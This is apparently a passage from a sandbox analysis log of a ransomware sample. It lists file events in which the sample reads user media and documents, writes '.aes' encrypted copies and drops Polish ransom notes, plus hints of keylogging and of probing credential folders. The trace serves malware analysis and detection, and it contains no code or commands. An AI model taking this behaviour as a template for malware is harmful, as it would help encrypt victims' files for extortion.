| Create | C:\Users\kFT6uTQW\Pictures\IjyzG07WaZVWa6FxqH0.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\np ZA.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\np ZA.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\OyPzZX.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\OyPzZX.jpg.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\CQqMpg-jbIVE.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\CQqMpg-jbIVE.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\EH1OC XshC.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\EH1OC XshC.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\jmrFGsOlm2gK_qf.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\jmrFGsOlm2gK_qf.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\MtD6XQw0JRc8h.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6\MtD6XQw0JRc8h.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\D XgP5yxO\zXoge.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\D XgP5yxO\zXoge.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\D XgP5yxO\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\B95U.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\B95U.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\M9qFpAQ6hssl8wHB.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\M9qFpAQ6hssl8wHB.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\MMTRDLYGm.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\MMTRDLYGm.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\om RIMvMjXnxZplIa-.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\om RIMvMjXnxZplIa-.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\bdvGDQlhD8Y.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\bdvGDQlhD8Y.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\ldkH5kxqMk43.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\ldkH5kxqMk43.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\BPwDqBd367v5jCWf.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\BPwDqBd367v5jCWf.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\LbtiEV6ysxhhXCJQ.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\LbtiEV6ysxhhXCJQ.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\gIud.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\gIud.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\QNSMQvCMaaiUq5u.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Music\QNSMQvCMaaiUq5u.wav.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\Eyqf5KSeCaMN6njljm\y3M6CHiHDf_Yy2sBAzE.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\Eyqf5KSeCaMN6njljm\y3M6CHiHDf_Yy2sBAzE.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\Eyqf5KSeCaMN6njljm\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4\eJvtTMxbiz6SbBueW.swf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4\eJvtTMxbiz6SbBueW.swf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4\xSTC7qezlhs _STE0B.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4\xSTC7qezlhs _STE0B.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\WQHnOCgB21aCcC\4M2T-htfvXV73.swf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\WQHnOCgB21aCcC\4M2T-htfvXV73.swf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\WQHnOCgB21aCcC\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\-VerO sQDwv.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\-VerO sQDwv.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\TRj26cC8jkp.flv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\TRj26cC8jkp.flv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\uBDJLyCr8A-TTa.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\uBDJLyCr8A-TTa.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\7X-GM.flv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\7X-GM.flv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\l1V__tJSHnXI.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\l1V__tJSHnXI.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\ppcN9b5Q ExH-k00.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\ppcN9b5Q ExH-k00.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\zWeITqPQ 5L.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz\zWeITqPQ 5L.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\4wDnaCEpKp.swf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\4wDnaCEpKp.swf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\dew6BPRQzNyZf.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\dew6BPRQzNyZf.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\fcAcCQTQF.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\fcAcCQTQF.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\J2AjPHasg.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL\J2AjPHasg.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\empW-4AlIY3p9Rubm.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\empW-4AlIY3p9Rubm.mp4.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\jJRuTZgC0AQOiwVU.flv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\jJRuTZgC0AQOiwVU.flv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\pI8CT7hfK.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\extoA\pI8CT7hfK.avi.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\TydhicM2z.flv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\TydhicM2z.flv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Videos\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\1LWQeuU.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\1LWQeuU.xls.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\8ir7B9DO0uh.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\8ir7B9DO0uh.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\SakdPF0XTjzY.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\SakdPF0XTjzY.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\y48XZ.pdf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh\y48XZ.pdf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create Directory | C:\ProgramData\Keyboard |
|
1 | ||
| Create Pipe | Anonymous read pipe | size = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe.config | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Keyboard | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Keyboard\17102017_012722.log | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\ProgramData\Keyboard\17102017_012722.log | type = file_type |
|
2 | |
| Get Info | C:\ProgramData\Keyboard\17102017_012722.log | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Acrobat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Acrobat\10.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Acrobat\10.0\Collab | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Acrobat\10.0\Forms | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Flash Player | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Flash Player\AssetCache | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Headlights | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Linguistics | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\Linguistics\Dictionaries | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Adobe\LogTransport2 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Identities | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia\Flash Player | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia\Flash Player\macromedia.com | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\AddIns | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\CLView | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\CLView\1033 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Credentials | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Crypto | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Crypto\RSA | type = file_attributes |
|
2 | |
